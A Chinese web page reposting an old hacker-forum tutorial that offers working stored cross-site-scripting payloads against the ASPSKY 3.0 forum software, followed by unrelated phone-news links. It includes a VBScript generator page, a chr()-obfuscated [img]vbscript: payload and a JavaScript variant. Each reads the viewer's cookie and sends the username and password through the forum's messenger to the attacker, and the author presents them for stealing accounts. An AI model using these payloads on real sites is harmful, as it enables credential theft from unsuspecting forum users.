您的位置 首页 趣闻

跨站脚本弹框问题解决

,跨站脚本弹框问题解决

跨站脚本得COOKIE弹框框的问题

 同时把密码用户名发到你在论坛的邮相里,爽吧

 先头看到欲望之翼的self.window的办法

其实我一直有个从来没给任何人说的办法:

玩了好久了公布了呵呵:

  <html>

<script language=vbs>

sub changeq()

if form1.loc.value="" or form1.who.value="" then

msgbox "没有加入地址或用户名?"

exit sub

end if

loc=form1.loc.value

user=form1.who.value

str="[img]vbscript:execute("on error resume next: call document.body.inse

rtAdjacentHTML(""beforeEnd"",""<div style=display:none&

gt;<iframe id=sendmessage></iframe></div>""):call se

ndmessage.window.open(""" & loc & "/messanger.asp?action=send&touser="

& user & "&title=""+mid(documents.cookie,instr(lcase(documents.cookie),

""password"")+9,10)+""&message=""+""I am a goo

d boy"",""_self"")  ")[/img]"

form1.area.value=str

end sub

 

</script>

<body>

<FONT SIZE=7 COLOR=RED>ASPSKY 3.0 偷号器---C.Z.Y原创</FONT>

<form name=form1>

设置发送地址:<input type=text name=loc size=50><br>

▲注意发送地址形如:http://www.nnit30.com/newbbs(newbbs是网站中论坛的安装目录

最后

不用加/)<br>

发送的用户名:<input type=text name=who size=20>-------------

<input type=button name=change value=生成代码 onclick=changeq()><br>

生成的代码:)<textarea name=area rows=10 cols=100></textarea>

</form>

</body>

</html>

 

搞了大半天的结果,偷aspsky 3.0 密码的东东把下面的代码改一改

然后发到你的贴子里,只要有人看你的贴子他的密码就自动发到你的在

论坛上的邮箱里了,爽吧,其实我的是用VBScript写的snwcwt用javascript

写的没有双引号的问题而且可以同时写几行代码所以要实用一些!!

  不过效果都差不多哈:)(注意要先把下面的东东改一下发送的地址然

后全部写在一行里)

  

[img]vbscript:window.open(chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&ch

r(47)&chr(119)&chr(119)&chr(119)&chr(46)&chr(110)&chr(110)&chr(105)&chr(116)&chr

(51)&chr(48)&chr(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(110)&chr(101)&chr(119

)&chr(98)&chr(98)&chr(115)&chr(47)&chr(109)&chr(101)&chr(115)&chr(115)&chr(97)&c

hr(110)&chr(103)&chr(101)&chr(114)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr

(97)&chr(99)&chr(116)&chr(105)&chr(111)&chr(110)&chr(61)&chr(115)&chr(101)&chr(1

10)&chr(100)&chr(38)&chr(116)&chr(111)&chr(117)&chr(115)&chr(101)&chr(114)&chr(6

1)&chr(99)&chr(122)&chr(121)&chr(38)&chr(116)&chr(105)&chr(116)&chr(108)&chr(101

)&chr(61)&chr(104)&chr(105)&chr(104)&chr(105)&chr(38)&chr(109)&chr(101)&chr(115)

&chr(115)&chr(97)&chr(103)&chr(101)&chr(61)+chr(80)&chr(97)&chr(115)&chr(115)&ch

r(58)+mid(lcase(documents.cookie),instr(lcase(documents.cookie),chr(112)+chr(97)+c

hr(115)+chr(115)+chr(119)+chr(111)+chr(114)+chr(100))+9,len(documents.cookie)-ins

tr(lcase(documents.cookie),chr(112)+chr(97)+chr(115)+chr(115)+chr(119)+chr(111)+c

hr(114)+chr(100))+9)+chr(32)+chr(32)+chr(32)+chr(32)+chr(78)&chr(97)&chr(109)&ch

r(101)&chr(58)+mid(lcase(documents.cookie),instr(lcase(documents.cookie),chr(117)+

chr(115)+chr(101)+chr(114)+chr(110)+chr(97)+chr(109)+chr(101))+9,(instr(lcase(do

cument.cookie),chr(117)+chr(115)+chr(101)+chr(114)+chr(99)+chr(108)+chr(97)+chr(

115))-1)-instr(lcase(documents.cookie),chr(117)+chr(115)+chr(101)+chr(114)+chr(11

0)+chr(97)+chr(109)+chr(101))-9),chr(49)&chr(49),chr(116)&chr(111)&chr(112)&chr(

61)&chr(50)&chr(48)&chr(48)&chr(48)&chr(44)&chr(108)&chr(101)&chr(102)&chr(116)&

chr(61)&chr(50)&chr(48)&chr(48)&chr(48)&chr(44)&chr(104)&chr(101)&chr(105)&chr(1

03)&chr(104)&chr(116)&chr(61)&chr(49)&chr(44)&chr(119)&chr(105)&chr(100)&chr(116

)&chr(104)&chr(61)&chr(49))[/img]

简化形式:window.open(打开的连接,窗体名,窗体大小设置)

打开的连接:

第一部份:http://xxx.xxx.xxx.xxx/xxxx/messanger.asp?action=send.....

对应编码为:chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(119)&

chr(119)&chr(119)&chr(46)&chr(110)&chr(110)&chr(105)&chr(116)&chr(51)&chr(48)&ch

r(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(110)&chr(101)&chr(119)&chr(98)&chr(9

8)&chr(115)&chr(47)&chr(109)&chr(101)&chr(115)&chr(115)&chr(97)&chr(110)&chr(103

)&chr(101)&chr(114)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr(97)&chr(99)&ch

r(116)&chr(105)&chr(111)&chr(110)&chr(61)&chr(115)&chr(101)&chr(110)&chr(100)&ch

r(38)&chr(116)&chr(111)&chr(117)&chr(115)&chr(101)&chr(114)&chr(61)&chr(99)&chr(

122)&chr(121)&chr(38)&chr(116)&chr(105)&chr(116)&chr(108)&chr(101)&chr(61)&chr(1

04)&chr(105)&chr(104)&chr(105)&chr(38)&chr(109)&chr(101)&chr(115)&chr(115)&chr(9

7)&chr(103)&chr(101)&chr(61)

不同的网站要自已改注意在哪儿结束同时还有发到的用户名都在这儿改

对于编码看如下代码:

<html>

<script language=vbs>

sub main()

base=form1.text1.value

for i=1 to len(base)

aa=asc(mid(base,i,1))

document.write "chr(" & aa & ")" & "&"

next

end sub

</script>

<body ><form name=form1><table>

<tr><td>

<input type=text name=text1 size=40><br>

<input type=button name=button1 onclick=main() value=change>

</td></tr>

</table></form></body></html>

  

 

第二部份:为提取的COOKIE中的用户名和密码

 

------------------------再来一个js的放便学习----------------------------------

[img]javascript:eval('var myCookie=documents.cookie;var iUser0=myCookie.indexOf(\

'username=\');var iUser1=myCookie.indexOf(\'&\',iUser0);if(iUser1==-1) iUser1=my

Cookie.length;var username=myCookie.substring(iUser0+9,iUser1);var iPW0=myCookie

.indexOf(\'password=\');iPW1=myCookie.indexOf(\'&\',iPW0);if(iPW1==-1) iPW1=myCo

okie.length;var password=myCookie.substring(iPW0+9,iPW1);document.body.insertAdj

acentHTML(\'BeforeEnd\',\'<div style=display:block><iframe id=sendmessage src=me

ssanger.asp?action=new&touser=snwcwt></iframe></div>\');sendmessage.window.docum

ent.location=\'http://www.nnit30.com/newbbs/messanger.asp?action=send&touser=snw

cwt&title=\'+username+\'的密码&message=username=\'+username+\'    password=\'+pa

ssword+\'\';')[/img]
 

免责声明:文章内容不代表本站立场,本站不对其内容的真实性、完整性、准确性给予任何担保、暗示和承诺,仅供读者参考,文章版权归原作者所有。如本文内容影响到您的合法权益(内容、图片等),请及时联系本站,我们会及时删除处理。

作者: dawei

【声明】:第七手机网内容转载自互联网,其相关言论仅代表作者个人观点绝非权威,不代表本站立场。如您发现内容存在版权问题,请提交相关链接至邮箱:bqsm@foxmail.com,我们将及时予以处理。

为您推荐

敢为天下后,OPPO Find N折叠屏的底气何在?

聊起OPPO,给我的第一印象就是本分,而在刚刚发布的OPPO Find N折叠屏手机上,我看到的是OPPO敢为天下后的底气。 当大家还沉浸在前一天发布的马里亚纳MariSilicon X影像NPU芯片时,OPPO又在12月15日推出了旗下首款折叠屏手机产品OPPO Find N。这是一款传闻已

OPPO Find N展开一刻,两大创新技术打破折痕路上意难平

荣耀发布了荣耀60系列的新品,特别是荣耀60 Pro的5000万像素超感知AI前置镜头和1亿像素超清后置主摄,是生活和游玩记录的好帮手。多镜录像功能在荣耀50系列上就已开始引入,在荣耀60系列上还新增了AI手势识别,Vlog隔空换镜这一创新功能,对拍摄Vlog来说相当

深扒天玑9000,发冲高关键年产品底气怎样?

联发科的天玑9000自公布以来,以过硬的技术实力迅速冲上了包括微博热搜在内的各类话题平台,吹响了冲击旗舰的号角。手机芯片进入4nm时代,arm推出面向未来十年的v9架构,5G技术R16即将商用,内存技术在升级面对全产业大跃进之势,联发科的天玑也迎来了上升的

想拍更远?汇总今年搭载潜望式长焦摄像头的手机

部分手机摄影发烧友已不再满足普通的2x长焦摄像头,他们需要拍的更远,画质也不能妥协,于是能拍更远的潜望式长焦摄像头就应运而生了。不过当镜头焦距上去了,后置镜头模组的厚度就难以控制,如果强行塞下更长焦段的镜头,模组厚度将达到1~2cm,这样的手机估

像素并非越高越好,为何5000万像素手机镜头倍受青欢迎

500万、800万、1200万像素,智能手机摄像头像素在早年发展的步伐相对还是比较缓慢,近来2000万、4800万、6400万、1.08亿像素接踵而来,手机摄像头的像素规格呈现出十分迅猛的迭代更新速度。然而在2019年首推量产1.08亿像素的智能手机后,至今手机上单颗传感

返回顶部